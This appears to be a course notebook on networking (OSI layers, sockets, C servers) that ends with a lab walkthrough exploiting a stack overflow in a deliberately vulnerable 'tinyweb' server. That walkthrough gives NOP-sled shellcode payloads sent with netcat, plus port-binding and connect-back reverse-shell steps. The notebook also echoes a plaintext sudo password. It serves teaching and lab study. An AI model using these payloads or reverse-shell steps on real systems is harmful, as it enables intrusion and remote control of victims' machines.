# Networking
- computer networks are so ubiquitous that they're taken for granted
- we're constantly connected to Internet and use applications that rely on networking
    - email, social media, the Web
- these applications rely on a particular network protocol, but each protocol uses the same general network transport methods
- there are vulnerabilities in the networking protocols themselves and on systems and applications running on the network

## OSI Model
- Open Systems Interconnection model
- governs the language used by systems in the network to talk to each other
- the structure of the language is described in 7 layers by the OSI model
- the conceptual layers make it easier for different network devices (routers, switches, firewalls) and applications (Web, email) to focus on their respective layers and ignore the others

### OSI layers
<img src="./resources/OSIModel.png">

1. **Physical layer** 
    - lowest layer that deals with the physical connection between two points
    - responsible for activating, maintaining, and deactivating these bit-stream communications
    - Ethernet card and cable, WiFi Card belong to this layer
- **Data-link layer**
    - deals with transferring data providing high-level functions (error correction and flow control)
    - provides procedures for activating, maintaining, and deactivating data-link connections
    - ARP (Address Resoultion Protocol) is a common protocol that uses this layer
    - Ehternet switches are network devices that use Layer 2 protocol
- **Network layer**
    - works as the middle ground
    - primarily role is to pass information between the lower and the higher layers
    - provides addressing (IP) and routing between two different networks
    - most routers and layer-3 switches are primarily use this layer
- **Transport layer**
    - provides transparent transfer of data between systems
    - provides reliable data communication, so the higher layers do not have to worry about reliability or cost-effectiveness of data transmission
    - TCP, UDP and ICMP are commonly used protocols of this layer
- **Session layer**
    - responsible for establishing and maintaining connections between network applications
- **Presentation layer**
    - responsible for presenting the data to applications in a syntax or language they understand
    - supports things like encryptiong, data compressions, image file (GIF, JPG) etc.
- **Application layer**
    - the layer users interact with
    - concerned with keeping track of the requirements of the application
    - HTTP, FTP, SMTP, SSH, Telnet are some protocols used in this layer
    
### Packet Encapsulation
- starting from the application layer, the packet wraps the presentation layer around the data, which wraps the session layer, which wraps the transport layer, and so forth
<img src="./resources/PacketEncapsulation.png">

## Sockets
 - standard way to perform network communications through the OS
 - socket API takes care of OSI details
 - in C, sockets behave a lot like files where you use read() and write() to receive and send data
 - /usr/includesys/sockets.h provide a bunch of functions to work with sockets
 - socket(), connect(), bind(), listen(), accept(), send(), recv()
 - we'll use Scapy python library to create packets with various protocol types and send across networks
     - we'll use these notebooks to learn scapy: https://github.com/rambasnet/ScapyNotebooks
     

## A Simple Server Example
- a server that listens for TCP connection on port 7890
- when a client connects it sends a message *Hello World!* and receives data until connection is closed
- booksrc/simple_server.c and booksrc/hacking.h are the two files required to build the simple server
```
$ g++ simple_server.c -o simple_server.exe
$ ./simple_server.exe
$ telnet 127.0.0.1 7890
```

In [7]:
! cp ./booksrc/simple_server.c .
! cp ./booksrc/hacking.h .

In [8]:
! cat simple_server.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "hacking.h"

#define PORT 7890	// the port users will be connecting to

int main(void) {
	int sockfd, new_sockfd;  // listen on sock_fd, new connection on new_fd
	struct sockaddr_in host_addr, client_addr;	// my address information
	socklen_t sin_size;
	int recv_length=1, yes=1;
	char buffer[1024];

	if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
		fatal("in socket");

	if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
		fatal("setting socket option SO_REUSEADDR");
	
	host_addr.sin_family = AF_INET;		 // host byte order
	host_addr.sin_port = htons(PORT);	 // short, network byte order
	host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP
	memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct

	if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
		fatal("b

In [9]:
! cat hacking.h

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

// dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
	unsigned char byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes from line
				byte = data_buffer[

In [10]:
! ./compile.sh simple_server.c simple_server.exe

simple_server.c: In function ‘main’:
simple_server.c:48:3: warning: implicit declaration of function ‘close’ [-Wimplicit-function-declaration]
   close(new_sockfd);
   ^


### run  ./simple_server.exe from terminal

### run telnet 127.0.0.1 7890 from another terminal
### run telnet private ip 7890 from another computer in the same network
- interact with the server by sending some data
- notice 0x0D 0x0A at the end of every data sent
- telnet and HTTP protocols expect lines/data to be terminted with these two bytes
- when done enter ctrl+] and close command on telnet> prompt

In [14]:
! man ascii | egrep "Hex|0A|0D"

       Oct   Dec   Hex   Char                        Oct   Dec   Hex   Char
       012   10    0A    LF  '\n' (new line)         112   74    4A    J
       015   13    0D    CR  '\r' (carriage ret)     115   77    4D    M


### telnet to webserver
- from terminal telnet www.coloradomesa.edu 80
- issue HEAD / HTTP/1.0 command and enter twice

## A Tinyweb Server
- similar to simple server but uses HTTP protocol to communicate
- source to compile - booksrc/tinyweb.c
- handles HTTP GET and HEAD requests
- looks for the requested resource in the local directory callled webroot and send it to the browser
- if the file can't be found, the server will respond with 404 HTTP (`File Not Found`) response
- compile tinyweb.c, setuid as root and run the server
- 
- **Note** Change PORT # to 8080 or something higher if port 80 is being used
    - On SEED Lab VM port 80 is used by apache, you can kill the process
    ```
    $ sudo apache2ctl stop

    ```
````bash
$ compile.sh tinyweb.c tinyweb.exe
$ sudo chown root ./tinyweb.exe
$ sudo chmod u+s ./tinyweb.exe
$ ./tinyweb.exe
```

In [2]:
! cp booksrc/tinyweb.c .
! cp booksrc/hacking-network.h .
! cp booksrc/hacking.h .

In [3]:
! cat tinyweb.c

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "hacking.h"
#include "hacking-network.h"

#define PORT 80   // the port users will be connecting to
#define WEBROOT "./webroot" // the web server's root directory

void handle_connection(int, struct sockaddr_in *); // handle web requests
int get_file_size(int); // returns the filesize of open file descriptor

int main(void) {
   int sockfd, new_sockfd, yes=1; 
   struct sockaddr_in host_addr, client_addr;   // my address information
   socklen_t sin_size;

   printf("Accepting web requests on port %d\n", PORT);

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
      fatal("setting socket option SO_REUSEADDR");

   host_addr.sin_family = AF_INET;      // host byte order
   host_addr.sin_port = htons

In [4]:
! cp -r booksrc/webroot .
! ls -l webroot

total 52
-rwxr-xr-x 1 user user 46794 Sep 11 13:15 image.jpg
-rw-r--r-- 1 user user   261 Sep 11 13:15 index.html


In [20]:
! cat webroot/index.html

<html>
<head><title>A sample webpage</title></head>
<body bgcolor="#000000" text="#ffffffff">
<center>
<h1>This is a sample webpage</h1>
...and here is some sample text<br>
<br>
..and even a sample image:<br>
<img src="image.jpg"><br>
</center>
</body>
</html>


In [17]:
! cat hacking-network.h

/* This function accepts a socket FD and a ptr to the null terminated
 * string to send.  The function will make sure all the bytes of the
 * string are sent.  Returns 1 on success and 0 on failure.
 */
int send_string(int sockfd, unsigned char *buffer) {
   int sent_bytes, bytes_to_send;
   bytes_to_send = strlen(buffer);
   while(bytes_to_send > 0) {
      sent_bytes = send(sockfd, buffer, bytes_to_send, 0);
      if(sent_bytes == -1)
         return 0; // return 0 on send error
      bytes_to_send -= sent_bytes;
      buffer += sent_bytes;
   }
   return 1; // return 1 on success
}

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence in seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, unsigned char *dest_buffer) {
#define EOL "\r\n" // End-Of-Line by

In [5]:
! ./compile.sh tinyweb.c tinyweb.exe

tinyweb.c: In function ‘handle_connection’:
tinyweb.c:101:16: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
                read(fd, ptr, length); // read the file into memory
                ^~~~
                fread
tinyweb.c:105:13: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
             close(fd); // close the file
             ^~~~~
             pclose


In [6]:
! cat hacking.h

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

// dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
	unsigned char byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes from line
				byte = data_buffer[

In [25]:
! echo dees | sudo -S chown root:root ./tinyweb.exe

[sudo] password for seed: 

In [26]:
! ls -al tinyweb.exe

-rwxrwxr-x 1 root root 16676 Sep  5 10:27 tinyweb.exe


In [27]:
! echo dees | sudo -S chmod u+s ./tinyweb.exe

[sudo] password for seed: 

In [28]:
! ls -al tinyweb.exe

-rwsrwxr-x 1 root root 16676 Sep  5 10:27 tinyweb.exe


### run tinyweb.exe from a terminal
### open a browser and browse to localhost:8080

## Tinyweb Stack Overflow Exploitation
- find overlfow vulnerability
- find the return address and offset from request buffer
- run the tinyweb.exe and get its process id to attach it to the gdb

```
$ ps aux | grep tinyweb

```

- Attach gdb to the tinyweb server

```
$ sudo gdb -q --pid=[tinywebpid] --symbols=./tinyweb.exe
```

- use gdb to examine memory and addresses

```
gdb-peda$ list
gdb-peda$ list main
gdb-peda$ list 44 # list 10 lines around line #44
gdb-peda$ break 62 # break at recv_line function that has overrun issue
gdb-peda$ continue
make a get request using a terminal or browser to hit the breakpoint
gdb-peda$ print request
gdb-peda$ print /x &request
        Note the beginning address of request variable
gdb-peda$ x/10wx request+500 - examine 16 words at request+500 bytes variable in stack - return address must be definitely 500 bytes away from request!
gdb-peda$ bt  # gives the return address to main
gdb-peda$ x/x $ebp+4 # gives the address where return address is stored on stack - 0xbfffec7c
gdb-peda$ p /u [add of return address] - [request address] # the bytes away from the request which is 524 bytes = OFFSET
echo $((0x…))
Few bytes near the beginning of the buffer may be mangled so skip first 200 bytes

```
- exit the debugger and rerun the server on the same terminal

## Local Shellcode Exploit
- create a exploit code and send it to the server
- total length of string buffer is the offset or difference between the return address - request buffer + 4 bytes

```
| repeated NOP SLED \x90 | exploit code | repeated controlled return addrees that will land somewhere in NOP SLED |

```

- total length - exploit code length - 30 x return address

```
echo $((524+4-24-30*4))
```

- find soft landing zone in nop sled

```
$echo printf "%x" $((address of request + 100))
```

- create and send the final exploit code

```
echo -n $(perl -e 'print "\x90"x384'; cat shellcode.bin; perl -e 'print "landing address in reverse order"x30 . "\r\n"') > tinyexploit.txt
cat tinyexploit.txt | nc -v 127.0.0.1 8080
```
- you'll get a local shell on the terminal where tinyweb.exe is running

## Port Binding Shellcode Exploit
- Generate Shellcode using GDB PEDA
- add about 100 bytes to the beginning address of request to get the working landing address
```
gdb-peda$ shellcode generate
gdb-peda$ shellcode generate x86/linux bindport  port ip
$ perl -e 'print "copy line by line"' >> bindport.bin
$ echo -n $(perl -e 'print "\x90"x384'; cat bind.bin; perl -e 'print "landing address in reverse order"x30 . "\r\n"') > tinyexploit.bin
$ cat tinyexploit.txt | nc -v ip port
```
- from another cell use nc to connect to the victim ip using the shellcode port

# Connect-back Shellcode Exploit
- connecting to the victim machine is not easy due to firewall and IDS, IPS, etc.
- out going connection is typically allowed, so we create connect back (TCP Reverse connect) shellcode
- Generate Shellcode using GDB PEDA
- add about 100 bytes to the beginning address of request to get the working landing address

```
gdb-peda$ shellcode generate x86/linux connect port ip

```
- write shellcode to a file as binary one line at a time

```
$ echo -n -e 'shellcode line1' > reverse_tcp.bin
$ echo -n -e 'shellcode line2' >> reverse_tcp.bin
...
```

- calculate [NOP sled*n + reverse_tcp.bin + repeated return address]
- repeated return address = address of request + 100
- run a server on attacker machine so the victim can connect back
    - nc -v -l -p port
- create a bogus exploit request and send it to the server using netcat
```
$ echo -n -e $(perl -e 'print "\x90"xn; cat reverse_tcp.bin; perl -e 'print "controlled return add"x m. "\r\n"' | nc -v ip port
```

### References
1. Understanding Layer 2, 3, and 4 Protocols - http://ptgmedia.pearsoncmg.com/images/0131014684/samplechapter/0131014684_ch02.pdf